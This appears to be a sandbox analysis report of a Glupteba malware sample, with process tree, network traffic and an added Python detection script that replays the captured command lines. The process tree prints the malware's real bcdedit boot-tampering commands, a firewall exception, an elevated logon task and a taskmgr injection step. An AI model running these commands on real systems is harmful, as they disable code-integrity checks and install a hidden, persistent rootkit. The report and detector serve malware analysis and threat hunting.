Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    25-12-2024 14:53

General

  • Target

    JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe

  • Size

    4.1MB

  • MD5

    4347d1e8d835af022da5509bf3c17266

  • SHA1

    4ab23c1a468cee9f4059559df3b4d05474076d2e

  • SHA256

    d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38

  • SHA512

    8ab13c820c36cb62f425a08a3f7af0d8c88a7aea86653a4c630fa031e00e7516e89f0374797c4249ee061e81fce382d904cc6a05c000ad8bb7d5136020d157d9

  • SSDEEP

    98304:ym00TdmKgb6GMZr9Fbw3WF6/w6nn8ZBybm6pg:jPpmjOUGdyaN

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba family
  • Glupteba payload 20 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Rootkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Rootkits write to WinMonFS to hide directories/files from being detected.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 3 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe
    "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2228
    • C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe
      "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d97ac1c36196a41ae4f0e3ee2033a24f67ba5953f210f3d4dd53b5464a6eaf38.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          • Modifies data under HKEY_USERS
          PID:2804
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Manipulates WinMon driver.
        • Manipulates WinMonFS driver.
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1716
        • C:\Windows\system32\schtasks.exe
          schtasks /delete /tn ScheduledUpdate /f
          4⤵
          PID:2756
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1244
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1488
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:648
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:944
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:852
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1328
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:752
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1648
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2500
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2272
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1468
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:972
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1940
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2156
        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2116
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:556
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:864
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2188
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241225145336.log C:\Windows\Logs\CBS\CbsPersist_20241225145336.cab
    1⤵
    • Drops file in Windows directory
    PID:2708
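The process tree above is the whole boot-tampering and persistence sequence in one place: a netsh exception for the dropped C:\Windows\rss\csrss.exe (a system binary name outside System32), an ONLOGON task at highest run level, and a run of bcdedit calls that create a second OSLOADER entry ("Windows Fast Mode") whose path is \Windows\system32\osloader.exe rather than winload.exe, whose kernel element names a private kernel image, with recovery disabled and nointegritychecks set, and which is then made the default with a zero timeout so the boot menu is never shown. The script below is an added example, not part of the sandbox report: it replays those command lines (copied from the tree, with the bcdedit subset that matters, plus two constructed benign controls), rebuilds the boot entry the bcdedit sequence produces and applies masquerading, firewall and scheduled-task rules. The trusted-directory lists are assumptions.

```python
"""Hunting rules over process-creation command lines, replaying the Glupteba
process tree above.  Added example, not part of the sandbox report."""
import re
from collections import defaultdict

# Windows binaries that malware impersonates; the real ones only live here.
SYSTEM_NAMES = {"csrss.exe", "smss.exe", "svchost.exe", "lsass.exe", "winlogon.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Locations for which an inbound firewall allow rule is unremarkable (assumption).
TRUSTED_PROGRAM_DIRS = ("c:\\program files", "c:\\windows\\system32\\")

# (image path, command line) pairs copied from the process tree above,
# followed by two constructed benign controls.
EVENTS = [
    (r"C:\Windows\system32\netsh.exe",
     'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\\Windows\\rss\\csrss.exe" enable=yes'),
    (r"C:\Windows\rss\csrss.exe", r"C:\Windows\rss\csrss.exe"),
    (r"C:\Windows\system32\schtasks.exe",
     r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F'),
    (r"C:\Windows\system32\bcdedit.exe",
     r'C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER'),
    (r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe"),
    (r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe"),
    (r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0"),
    (r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1"),
    (r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast"),
    (r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\system32\bcdedit.exe -timeout 0"),
    (r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}"),
    (r"C:\Windows\System32\csrss.exe", r"%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows"),  # constructed, benign
    (r"C:\Windows\system32\schtasks.exe", r'schtasks /CREATE /SC DAILY /TR "C:\Program Files\Backup\backup.exe" /TN Backup'),  # constructed, benign
]


def tokenize(cmdline):
    """Whitespace-split a Windows command line, keeping quoted runs together."""
    return [t.replace('"', "") for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def reconstruct_bcd(cmdlines):
    """Replay bcdedit calls into {guid: entry} plus the store-wide default and timeout."""
    entries = defaultdict(lambda: {"settings": {}, "in_displayorder": False})
    store = {"default": None, "timeout": None}
    for cmd in cmdlines:
        toks = tokenize(cmd)
        if len(toks) < 2 or not toks[0].lower().endswith("bcdedit.exe"):
            continue
        verb, args = toks[1].lstrip("-/").lower(), toks[2:]  # bcdedit accepts -verb and /verb
        if verb == "create" and args:
            entry = entries[args[0].upper()]
            for i, a in enumerate(args[:-1]):  # -d <description>, -application <type>
                if a.lstrip("-/").lower() == "d":
                    entry["description"] = args[i + 1]
                elif a.lstrip("-/").lower() == "application":
                    entry["application"] = args[i + 1].upper()
        elif verb == "set" and len(args) >= 3:
            entries[args[0].upper()]["settings"][args[1].lower()] = " ".join(args[2:])
        elif verb == "displayorder" and args:
            entries[args[0].upper()]["in_displayorder"] = True
        elif verb == "default" and args:
            store["default"] = args[0].upper()
        elif verb == "timeout" and args:
            store["timeout"] = args[0]
    return dict(entries), store


def bcd_findings(entries, store):
    """Flag boot entries that weaken code integrity or hide themselves from the user."""
    out = []
    for guid, e in entries.items():
        s = e["settings"]
        if s.get("nointegritychecks") == "1":
            out.append(f"{guid}: nointegritychecks=1 asks the loader to skip code-integrity checks")
        if s.get("recoveryenabled") == "0":
            out.append(f"{guid}: recoveryenabled=0 suppresses recovery after a failed boot")
        if "kernel" in s:
            out.append(f"{guid}: private kernel image {s['kernel']} replaces ntoskrnl.exe")
        if "path" in s and not s["path"].lower().endswith(("\\winload.exe", "\\winload.efi")):
            out.append(f"{guid}: OS loader path {s['path']} is not winload")
    if store["default"] in entries and store["timeout"] == "0":
        out.append(f"{store['default']}: new entry made default with timeout 0, boot menu never shown")
    return out


def process_findings(events):
    """Masquerading, firewall-exception and elevated-logon-task rules over (image, cmdline)."""
    out = []
    for image, cmd in events:
        low = image.lower()
        name = low.rsplit("\\", 1)[-1]
        if name in SYSTEM_NAMES and not low.startswith(SYSTEM_DIRS):
            out.append(f"masquerade: {name} running from {image}")
        toks = [t.lower() for t in tokenize(cmd)]
        if toks and toks[0].rsplit("\\", 1)[-1] in ("netsh", "netsh.exe"):
            if {"advfirewall", "add", "action=allow"} <= set(toks):
                prog = next((t[len("program="):] for t in toks if t.startswith("program=")), "?")
                if not prog.startswith(TRUSTED_PROGRAM_DIRS):
                    out.append(f"firewall: inbound allow rule for {prog}")
        elif toks and toks[0].rsplit("\\", 1)[-1] in ("schtasks", "schtasks.exe"):
            if {"/create", "/rl", "highest"} <= set(toks) and ("onlogon" in toks or "onstart" in toks):
                tr = toks[toks.index("/tr") + 1] if "/tr" in toks[:-1] else "?"
                out.append(f"persistence: elevated logon task runs {tr}")
    return out


def run(events=EVENTS):
    """All findings for an event list, bcdedit replay included."""
    bcd_cmds = [cmd for image, cmd in events if image.lower().endswith("bcdedit.exe")]
    entries, store = reconstruct_bcd(bcd_cmds)
    return process_findings(events) + bcd_findings(entries, store)
```

Replaying the store rather than matching single bcdedit lines is the point: `-set ... nx OptIn` on its own is noise, but a freshly created OSLOADER entry with a non-winload path, a private kernel and integrity checks off that becomes the default boot entry is not. On a live host the same entry shows up in `bcdedit /enum all`, and the rules above expect the paths as Sysmon or EDR process-creation telemetry records them.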

Network

    • flag-us
      DNS
      66e7b432-6c9c-4a4f-b24e-c0458cb199f8.uuid.dg2sz7pxs7llf2t25fsbutlvvrjij4pmojugn75cmxnvoshmju6dzcad.onion
      csrss.exe
      Remote address:
      8.8.8.8:53
      Request
      66e7b432-6c9c-4a4f-b24e-c0458cb199f8.uuid.dg2sz7pxs7llf2t25fsbutlvvrjij4pmojugn75cmxnvoshmju6dzcad.onion
      IN TXT
      Response
    • flag-us
      DNS
      msdl.microsoft.com
      patch.exe
      Remote address:
      8.8.8.8:53
      Request
      msdl.microsoft.com
      IN A
      Response
      msdl.microsoft.com
      IN CNAME
      msdl.microsoft.akadns.net
      msdl.microsoft.akadns.net
      IN CNAME
      msdl-microsoft-com.a-0016.a-msedge.net
      msdl-microsoft-com.a-0016.a-msedge.net
      IN CNAME
      a-0016.a-msedge.net
      a-0016.a-msedge.net
      IN A
      204.79.197.219
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/index2.txt
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/index2.txt HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      X-Cache: TCP_MISS
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: C728C45AE7074F7AB553D4C6BB89E3B5 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:53:52Z
      Date: Wed, 25 Dec 2024 14:53:52 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 302 Found
      Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      X-Cache: TCP_MISS
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 4B45FB80BF29412F917EA06390442201 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:53:52Z
      Date: Wed, 25 Dec 2024 14:53:52 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 302 Found
      Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      X-Cache: TCP_HIT
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 6D7D9DA090B94FAB88A7FB18C1313B4E Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:54:02Z
      Date: Wed, 25 Dec 2024 14:54:02 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/index2.txt
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/index2.txt HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 404 Not Found
      X-Cache: TCP_HIT
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 21AAB382768F4D40A12C763CF4119AB7 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:54:14Z
      Date: Wed, 25 Dec 2024 14:54:13 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 302 Found
      Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      X-Cache: TCP_MISS
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 4012AB27DFFF49448EE9FC7CD4A37A66 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:54:14Z
      Date: Wed, 25 Dec 2024 14:54:14 GMT
      Content-Length: 0
    • flag-us
      GET
      https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
      patch.exe
      Remote address:
      204.79.197.219:443
      Request
      GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Host: msdl.microsoft.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 302 Found
      Location: https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=4oBr6COqQ1%2FRoPO8nTNyv01vSA5i9dELuorMq1OT9b0%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T10%3A06%3A11Z&ske=2024-12-27T11%3A06%3A11Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A04%3A39Z&sp=r&rscl=x-e2eid-082bd611-87614cfd-bbeafdff-21d73f3a-session-51f2194f-7e7a409e-ace650d5-c9cb9b59
      X-Cache: TCP_HIT
      Strict-Transport-Security: includeSubDomains
      X-MSEdge-Ref: Ref A: 7BDB70401E724A9F88D2AB4546F50D69 Ref B: LON04EDGE0814 Ref C: 2024-12-25T14:54:15Z
      Date: Wed, 25 Dec 2024 14:54:15 GMT
      Content-Length: 0
    • flag-us
      DNS
      vsblobprodscussu5shard30.blob.core.windows.net
      patch.exe
      Remote address:
      8.8.8.8:53
      Request
      vsblobprodscussu5shard30.blob.core.windows.net
      IN A
      Response
      vsblobprodscussu5shard30.blob.core.windows.net
      IN CNAME
      blob.sat09prdstrz08a.store.core.windows.net
      blob.sat09prdstrz08a.store.core.windows.net
      IN CNAME
      blob.sat09prdstrz08a.trafficmanager.net
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.70.36
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.79.68
      blob.sat09prdstrz08a.trafficmanager.net
      IN A
      20.150.38.228
    • flag-us
      GET
      https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      patch.exe
      Remote address:
      20.150.70.36:443
      Request
      GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0 HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: vsblobprodscussu5shard30.blob.core.windows.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 8752128
      Content-Type: application/octet-stream
      Content-Language: x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
      Accept-Ranges: bytes
      ETag: "0x8D4B1DACA398C54"
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7461382c-001e-003d-58dc-5659b4000000
      x-ms-version: 2019-07-07
      x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
      x-ms-lease-status: unlocked
      x-ms-lease-state: available
      x-ms-blob-type: BlockBlob
      x-ms-server-encrypted: true
      Access-Control-Expose-Headers: Content-Length
      Access-Control-Allow-Origin: *
      Date: Wed, 25 Dec 2024 14:53:53 GMT
    • flag-us
      GET
      https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0
      patch.exe
      Remote address:
      20.150.70.36:443
      Request
      GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=f1ii7NDyMbksXg6lvH9tIndZisxMIjWfIx0Gt4whJrY%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-12-25T12%3A05%3A05Z&ske=2024-12-27T13%3A05%3A05Z&sks=b&skv=2019-07-07&se=2024-12-26T15%3A19%3A29Z&sp=r&rscl=x-e2eid-f25dc17f-f3ec45b2-8ada7075-3285e531-session-205ff6fb-1edd4d75-ae8582df-ede12da0 HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: Microsoft-Symbol-Server/10.0.10586.567
